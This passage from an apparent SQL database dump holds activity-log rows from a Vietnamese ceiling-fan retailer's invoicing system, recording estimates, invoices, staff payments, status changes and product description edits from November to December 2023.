(2685, 'estimate', 236, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-08 08:47:13'),
(2686, 'estimate', 236, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-08 08:47:17'),
(2687, 'estimate', 237, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-08 09:54:17'),
(2688, 'estimate', 237, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-08 09:54:22'),
(2689, 'invoice', 311, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"30.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/359\" target=\"_blank\">#359</a>\";}', '17', 'Loan Nguyễn', '2023-11-08 16:36:41'),
(2690, 'estimate', 238, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-09 11:32:58'),
(2691, 'estimate', 238, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-09 11:33:03'),
(2692, 'invoice', 354, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-10 14:40:25'),
(2693, 'invoice', 355, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-11 16:46:30'),
(2694, 'invoice', 355, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:393:\"Sải cánh 152cm ( ~ 60inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nTuỳ chọn đèn: N/A (không có)  <br />\r\n\";i:1;s:353:\"Sải cánh 152cm ( ~ 60inch)  \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W  \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  \r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện)  \r\nMàu cánh: Gỗ sáng (Maple Wood)  \r\nTuỳ chọn đèn: N/A (không có)\";}', '1', 'Ho Gia Phat', '2023-11-11 16:47:20'),
(2695, 'invoice', 355, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-11-11 16:47:20'),
(2696, 'invoice', 356, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-13 11:51:26'),
(2697, 'invoice', 354, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-13 11:53:31'),
(2698, 'invoice', 354, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"810.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/360\" target=\"_blank\">#360</a>\";}', '17', 'Loan Nguyễn', '2023-11-13 11:53:31'),
(2699, 'invoice', 357, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-13 11:55:16'),
(2700, 'estimate', 236, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/357\">INV-347-23</a>\";}', '17', 'Loan Nguyễn', '2023-11-13 11:55:16'),
(2701, 'invoice', 357, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-13 15:53:57'),
(2702, 'invoice', 357, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.242.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/361\" target=\"_blank\">#361</a>\";}', '17', 'Loan Nguyễn', '2023-11-13 15:53:57'),
(2703, 'estimate', 239, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-13 16:25:10'),
(2704, 'estimate', 239, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:41:\"Chi phí nhân công + chi phí vật tư\";i:1;s:42:\"Chi phí nhân công + chi phí vật tư \";}', '17', 'Loan Nguyễn', '2023-11-13 16:25:44'),
(2705, 'estimate', 239, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-13 16:25:51'),
(2706, 'invoice', 358, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-13 16:44:53'),
(2707, 'estimate', 237, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/358\">INV-348-23</a>\";}', '17', 'Loan Nguyễn', '2023-11-13 16:44:53'),
(2708, 'invoice', 358, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-13 16:46:46'),
(2709, 'invoice', 358, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.888.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/362\" target=\"_blank\">#362</a>\";}', '17', 'Loan Nguyễn', '2023-11-13 16:46:46'),
(2710, 'estimate', 238, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-11-17 01:00:01'),
(2711, 'invoice', 359, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-19 09:44:06'),
(2712, 'invoice', 359, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:551:\"Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China    <br />\r\n\";i:1;s:497:\"Sải cánh 132cm ( ~ 52inch)     \r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     \r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     \r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     \r\nMàu cánh: Gỗ sáng (Maple Wood)     \r\nĐèn LED: 3 màu, 2700K - 3000K     \r\nĐiều khiển từ xa 5 tốc độ đi kèm     \r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China\";}', '1', 'Ho Gia Phat', '2023-11-19 09:57:32'),
(2713, 'invoice', 359, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6500000.00\";i:1;s:7:\"4500000\";}', '1', 'Ho Gia Phat', '2023-11-19 09:57:32'),
(2714, 'invoice', 359, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"38\";i:1;s:0:\"\";}', '1', 'Ho Gia Phat', '2023-11-19 09:57:32'),
(2715, 'estimate', 239, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>5</new_status>\";}', '[CRON]', '[CRON]', '2023-11-21 01:00:01'),
(2716, 'estimate', 240, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-23 09:06:57'),
(2717, 'estimate', 240, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-23 09:07:16'),
(2718, 'estimate', 240, 'invoice_estimate_activity_updated_item_short_description', 'a:2:{i:0;s:39:\"Nhân công lắp đặt quạt trần \";i:1;s:38:\"Nhân công lắp đặt quạt trần\";}', '17', 'Loan Nguyễn', '2023-11-23 09:57:51'),
(2719, 'invoice', 360, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-23 09:57:54'),
(2720, 'estimate', 240, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/360\">INV-350-23</a>\";}', '17', 'Loan Nguyễn', '2023-11-23 09:57:54'),
(2721, 'invoice', 360, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"25\";}', '17', 'Loan Nguyễn', '2023-11-23 09:58:57'),
(2722, 'invoice', 360, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-23 09:59:05'),
(2723, 'invoice', 360, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/363\" target=\"_blank\">#363</a>\";}', '17', 'Loan Nguyễn', '2023-11-23 09:59:05'),
(2724, 'estimate', 241, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-11-23 10:13:41'),
(2725, 'estimate', 242, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-11-23 14:16:02'),
(2726, 'invoice', 361, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-23 14:44:26'),
(2727, 'estimate', 242, 'estimate_activity_client_accepted_and_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/361\">INV-351-23</a>\";}', NULL, '', '2023-11-23 14:44:26'),
(2728, 'invoice', 362, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-23 15:45:38'),
(2729, 'estimate', 241, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/362\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2023-11-23 15:45:38'),
(2730, 'invoice', 359, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:30:05'),
(2731, 'invoice', 359, 'invoice_activity_unmarked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:30:11'),
(2732, 'invoice', 359, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:30:20'),
(2733, 'invoice', 355, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2023-11-24 14:31:27'),
(2734, 'invoice', 355, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/364\" target=\"_blank\">#364</a>\";}', '1', 'Ho Gia Phat', '2023-11-24 14:31:27'),
(2735, 'invoice', 358, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-11-24 14:35:52'),
(2736, 'invoice', 358, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"362\";i:1;s:12:\"3.888.000 đ\";}', '1', 'Ho Gia Phat', '2023-11-24 14:35:52'),
(2737, 'invoice', 358, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:35:57'),
(2738, 'invoice', 350, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2023-11-24 14:37:01'),
(2739, 'invoice', 350, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"357\";i:1;s:12:\"2.651.400 đ\";}', '1', 'Ho Gia Phat', '2023-11-24 14:37:01'),
(2740, 'invoice', 350, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:37:07'),
(2741, 'invoice', 356, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:37:39'),
(2742, 'invoice', 318, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:39:11'),
(2743, 'invoice', 335, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2023-11-24 14:40:14'),
(2744, 'invoice', 361, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2023-11-25 06:58:45'),
(2745, 'invoice', 361, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/365\" target=\"_blank\">#365</a>\";}', '1', 'Ho Gia Phat', '2023-11-25 06:58:45'),
(2746, 'invoice', 363, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-25 09:16:49'),
(2747, 'estimate', 243, 'estimate_activity_created', '', '17', 'Loan Nguyễn', '2023-11-29 09:30:36'),
(2748, 'estimate', 243, 'estimate_activity_marked', 'a:1:{i:0;s:18:\"<status>2</status>\";}', '17', 'Loan Nguyễn', '2023-11-29 09:30:44'),
(2749, 'invoice', 364, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-29 13:36:00'),
(2750, 'invoice', 365, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-29 13:57:08'),
(2751, 'invoice', 365, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-11-29 13:57:42'),
(2752, 'invoice', 366, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-11-29 14:19:58'),
(2753, 'invoice', 366, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"20\";i:1;s:2:\"25\";}', '1', 'Ho Gia Phat', '2023-11-29 14:20:07'),
(2754, 'invoice', 366, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2023-11-29 14:21:18'),
(2755, 'invoice', 366, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-29 15:00:35'),
(2756, 'invoice', 366, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-11-29 15:00:35'),
(2757, 'invoice', 353, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-29 15:13:13'),
(2758, 'invoice', 353, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/366\" target=\"_blank\">#366</a>\";}', '17', 'Loan Nguyễn', '2023-11-29 15:13:13'),
(2759, 'invoice', 355, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-11-29 17:01:00'),
(2760, 'invoice', 355, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/367\" target=\"_blank\">#367</a>\";}', '17', 'Loan Nguyễn', '2023-11-29 17:01:00'),
(2761, 'invoice', 367, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-11-30 17:13:07'),
(2762, 'invoice', 368, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-01 09:43:17'),
(2763, 'invoice', 368, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '17', 'Loan Nguyễn', '2023-12-01 09:44:43'),
(2764, 'invoice', 368, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-01 09:44:57'),
(2765, 'invoice', 368, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-12-01 09:44:57'),
(2766, 'estimate', 243, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:59:\"Cục nguồn điều khiển DC 6 tốc độ Mountair Air\";i:1;s:4:\"1.00\";i:2;s:1:\"3\";}', '17', 'Loan Nguyễn', '2023-12-01 16:09:17'),
(2767, 'estimate', 239, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>5</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2023-12-05 13:53:45'),
(2768, 'estimate', 239, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:42:\"Chi phí nhân công + chi phí vật tư \";i:1;s:41:\"Chi phí nhân công + chi phí vật tư\";}', '1', 'Ho Gia Phat', '2023-12-05 13:53:45'),
(2769, 'invoice', 369, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-05 14:05:17'),
(2770, 'estimate', 243, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/369\">INV-359-23</a>\";}', '17', 'Loan Nguyễn', '2023-12-05 14:05:17'),
(2771, 'invoice', 369, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-05 14:05:44'),
(2772, 'invoice', 369, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.782.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/368\" target=\"_blank\">#368</a>\";}', '17', 'Loan Nguyễn', '2023-12-05 14:05:44'),
(2773, 'invoice', 367, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-05 14:06:13'),
(2774, 'invoice', 367, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"23.700.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/369\" target=\"_blank\">#369</a>\";}', '17', 'Loan Nguyễn', '2023-12-05 14:06:13'),
(2775, 'invoice', 370, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-12-10 09:50:53'),
(2776, 'invoice', 370, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"25000000.00\";i:1;s:8:\"34800000\";}', '1', 'Ho Gia Phat', '2023-12-10 09:51:35'),
(2777, 'invoice', 370, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:1:\"0\";i:1;s:2:\"28\";}', '1', 'Ho Gia Phat', '2023-12-10 09:51:35'),
(2778, 'estimate', 244, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-12-14 09:46:27'),
(2779, 'invoice', 371, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-18 09:01:13'),
(2780, 'invoice', 371, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:11:\"16900000.00\";i:1;s:11:\"13800000.00\";}', '17', 'Loan Nguyễn', '2023-12-18 09:02:51'),
(2781, 'invoice', 371, 'invoice_estimate_activity_updated_discount_item', 'a:2:{i:0;s:2:\"25\";i:1;s:1:\"0\";}', '17', 'Loan Nguyễn', '2023-12-18 09:02:51'),
(2782, 'invoice', 371, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:23:\"Chi phí vận chuyển\";}', '17', 'Loan Nguyễn', '2023-12-18 09:10:04'),
(2783, 'invoice', 371, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 09:10:30'),
(2784, 'invoice', 371, 'invoice_activity_marked_as_sent', 'a:0:{}', '17', 'Loan Nguyễn', '2023-12-18 09:10:30'),
(2785, 'estimate', 245, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-12-18 09:22:49'),
(2786, 'estimate', 245, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:1086:\"Đường kính cánh: 10ft ft (3 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)\";i:1;s:996:\"Đường kính cánh: 10ft ft (3 m) \r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum \r\nTốc độ quay tối đa / Max Speed: 70 RPM (max speed) \r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz \r\nĐiều khiển / Control: Remote Control for Wall \r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA \r\nTrọng lượng: 20 kg \r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 \r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) \r\n \r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) \r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 \r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum \r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm \r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn \r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)\";}', '1', 'Ho Gia Phat', '2023-12-18 09:23:57'),
(2787, 'invoice', 372, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:38:49'),
(2788, 'invoice', 372, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-18 10:38:49'),
(2789, 'invoice', 372, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:519:\"Đường kính cánh: 132cm   <br />\r\nĐộng cơ: BLDC motor, công suất 35W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: White<br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:458:\"Đường kính cánh: 132cm   \r\nĐộng cơ: BLDC motor, công suất 35W   \r\nBộ điều khiển từ xa  \r\nMàu sắc cánh: Maple Wood  \r\nMàu sắc thân quạt: White\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '17', 'Loan Nguyễn', '2023-12-18 10:39:26'),
(2790, 'invoice', 372, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:4:\"0.00\";i:1;s:10:\"3900000.00\";}', '17', 'Loan Nguyễn', '2023-12-18 10:39:26'),
(2791, 'invoice', 372, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:39:26'),
(2792, 'invoice', 372, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:40:10'),
(2793, 'invoice', 372, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/370\" target=\"_blank\">#370</a>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:40:10'),
(2794, 'invoice', 364, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:40:51'),
(2795, 'invoice', 364, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"350.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/371\" target=\"_blank\">#371</a>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:40:51'),
(2796, 'invoice', 366, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:41:20'),
(2797, 'invoice', 366, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.850.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/372\" target=\"_blank\">#372</a>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:41:20'),
(2798, 'invoice', 368, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:42:00'),
(2799, 'invoice', 368, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/373\" target=\"_blank\">#373</a>\";}', '17', 'Loan Nguyễn', '2023-12-18 10:42:00'),
(2800, 'invoice', 371, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-18 11:16:43'),
(2801, 'invoice', 371, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.195.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/374\" target=\"_blank\">#374</a>\";}', '17', 'Loan Nguyễn', '2023-12-18 11:16:43'),
(2802, 'invoice', 373, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2023-12-18 16:16:05'),
(2803, 'invoice', 374, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-19 16:18:09'),
(2804, 'estimate', 246, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2023-12-21 14:44:29'),
(2805, 'invoice', 373, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-21 16:14:20'),
(2806, 'invoice', 373, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"750.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/375\" target=\"_blank\">#375</a>\";}', '17', 'Loan Nguyễn', '2023-12-21 16:14:20'),
(2807, 'invoice', 311, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '17', 'Loan Nguyễn', '2023-12-21 16:15:13'),
(2808, 'invoice', 311, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"32.325.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/376\" target=\"_blank\">#376</a>\";}', '17', 'Loan Nguyễn', '2023-12-21 16:15:13'),
(2809, 'invoice', 363, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2023-12-26 01:00:02'),
(2810, 'invoice', 375, 'invoice_activity_created', '', '17', 'Loan Nguyễn', '2023-12-26 11:48:02'),
